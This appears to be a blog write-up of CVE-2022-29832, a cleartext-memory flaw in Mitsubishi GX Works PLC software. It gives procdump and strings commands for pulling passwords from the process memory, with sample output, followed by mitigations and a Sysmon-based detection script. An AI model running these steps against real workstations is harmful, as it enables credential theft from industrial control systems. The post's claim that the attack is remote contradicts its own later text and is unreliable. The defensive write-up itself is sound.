Author: SIEM-Safe  
Date: 2024-06-30

Introduction

Industrial automation depends on software for programming and configuring controllers. Mitsubishi Electric’s GX Works3, GX Works2, and GX Developer are widely used to manage PLCs (Programmable Logic Controllers)—the brains behind many factories, energy plants, and infrastructure. But with popularity comes risk.

In 2022, a serious vulnerability CVE-2022-29832 was uncovered. This flaw allows unauthenticated users (no login required!) to grab sensitive info by taking advantage of how these tools store sensitive data in memory—specifically, they store project files for MELSEC controllers in readable (cleartext) form.

This article will break down the vulnerability, demo the exploitation basics, and provide you with reference links straight to the source.

Attack Type: Remote, Unauthenticated

In simple terms: Project files (often containing passwords and security settings for critical factory PLCs) are left in readable memory regions. If an attacker gains access, even without logging in, they can collect sensitive information from these processes.

The Threat: Why It Matters

If you can grab a project file or configuration for a safety CPU or Q/FX/L series PLC, you hold keys to the kingdom:

- Reverse-engineer security settings or passwords

This goes beyond simple data leak—it’s about full control of automated physical systems.

Exploit Details

This is not a remote network exploit, but attacks from compromised endpoints (e.g., an infected engineer’s workstation) are straightforward:

1. Attacker gains access to a system running GX Works3/2/Developer.

2. Memory contents of the running process are dumped.

3. Sensitive info (project files, passwords) is readable in the dump, with no encryption or obfuscation.

Exploitation Example – Memory Dump with Task Manager & Strings

*Let’s see how an attacker could do this using native Windows tools and a free utility like Sysinternals’ VMMap or Procdump.*

1. Identify the Process

Let’s find the process for GX Works3 (example: GxWorks3.exe).

Get-Process | Where-Object { $_.ProcessName -like "*GxWorks3*" }

2. Dump the Process Memory

Download Sysinternals Procdump and run:

procdump -ma GxWorks3.exe

This command writes a full memory dump (including all cleartext strings) to a .dmp file. Procdump chooses the dump file name unless you pass one as the last argument, so substitute the actual file name for GxWorks3.dmp below.

3. Extract Readable Strings from the Dump

Using the classic strings utility:

strings GxWorks3.dmp > dump_strings.txt

Now open dump_strings.txt with a text editor and search for terms like password, access, or look for plaintext project data that references safety modules or Q/FX/L.

Example snippet you may see in the strings output

ProjectName: FactoryMain2024
[Settings]
Password=SuperSecret123
Module=Q03UDVCPU
SecurityLevel=4

Mitigation

Official Fix:  
Mitsubishi Electric's Security Advisory for this issue directs users to update to the latest software versions once patched releases are available.

- Restrict physical and remote access to engineering workstations.

- Use endpoint security/AV to detect memory dumping tools.
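One way to put that last bullet into practice, as an added example that is not from the advisory or from any Mitsubishi tooling: detection logic that flags Sysmon Event ID 10 (ProcessAccess) records in which another process obtains read access (PROCESS_VM_READ) to the GxWorks3.exe process, which is what a full memory dump requires. The key=value log layout and the sample events are constructed, and the watched-process list is an assumption that holds only the process name used in this article.

```python
"""Flag process-memory reads against GX Works3 in Sysmon-style ProcessAccess events.

Added example, not vendor code. Assumes Sysmon Event ID 10 fields flattened
into key=value lines; every sample record below is constructed.
"""
import re

# PROCESS_VM_READ (winnt.h): the access right a dumper such as
# "procdump -ma" needs to copy another process's address space.
PROCESS_VM_READ = 0x0010

# Assumption: only the process name the article uses; extend as needed.
WATCHED_TARGETS = {"gxworks3.exe"}

# Constructed sample records (Sysmon Event ID 10 = ProcessAccess, 1 = ProcessCreate).
SAMPLE_EVENTS = [
    "EventID=10 SourceImage=C:\\Tools\\procdump64.exe TargetImage=C:\\MELSOFT\\GxWorks3.exe GrantedAccess=0x1FFFFF",
    "EventID=10 SourceImage=C:\\Windows\\System32\\csrss.exe TargetImage=C:\\MELSOFT\\GxWorks3.exe GrantedAccess=0x1400",
    "EventID=10 SourceImage=C:\\Tools\\procdump64.exe TargetImage=C:\\Windows\\notepad.exe GrantedAccess=0x1FFFFF",
    "EventID=1 Image=C:\\Tools\\procdump64.exe CommandLine=procdump -ma GxWorks3.exe",
]

# key=value pairs; values may contain spaces, so stop before the next " key=".
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

def parse_event(line):
    """Turn one key=value record into a dict."""
    return dict(FIELD_RE.findall(line))

def is_memory_read_of_watched_process(event):
    """True when a ProcessAccess event grants VM_READ on a watched engineering tool."""
    if event.get("EventID") != "10":
        return False
    target = event.get("TargetImage", "").rsplit("\\", 1)[-1].lower()
    if target not in WATCHED_TARGETS:
        return False
    try:
        granted = int(event.get("GrantedAccess", "0"), 16)
    except ValueError:  # malformed field: do not crash the pipeline
        return False
    return bool(granted & PROCESS_VM_READ)

def find_dump_attempts(lines):
    """Return (source, target, granted_access) for each suspicious read."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_memory_read_of_watched_process(ev):
            hits.append((ev["SourceImage"], ev["TargetImage"], ev["GrantedAccess"]))
    return hits

if __name__ == "__main__":
    for hit in find_dump_attempts(SAMPLE_EVENTS):
        print("ALERT: memory read of engineering tool:", hit)
```

Benign system processes (the csrss.exe record, 0x1400) carry no VM_READ bit and are not flagged; tune WATCHED_TARGETS and an allowlist of source images to your environment.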

References

NVD CVE page: https://nvd.nist.gov/vuln/detail/CVE-2022-29832

Mitsubishi Electric advisory: https://www.mitsubishielectric.com/en/ssl/products/industry/automation-solutions/security/advisory/2022/019.html

Sysinternals Suite (Procdump, Strings): https://docs.microsoft.com/en-us/sysinternals/downloads/

Conclusion

CVE-2022-29832 shows how industrial automation security can hinge on the weakest link—local software practices. If you run automation or critical infrastructure, check your engineering stations, monitor access, and require the latest patches.

Remember: Most attacks start with an insider, phishing, or compromised PC—don’t give attackers an easy win by leaving your secrets in plain sight!

Timeline

Published on: 11/25/2022 00:15:00 UTC
Last modified on: 05/31/2023 07:15:00 UTC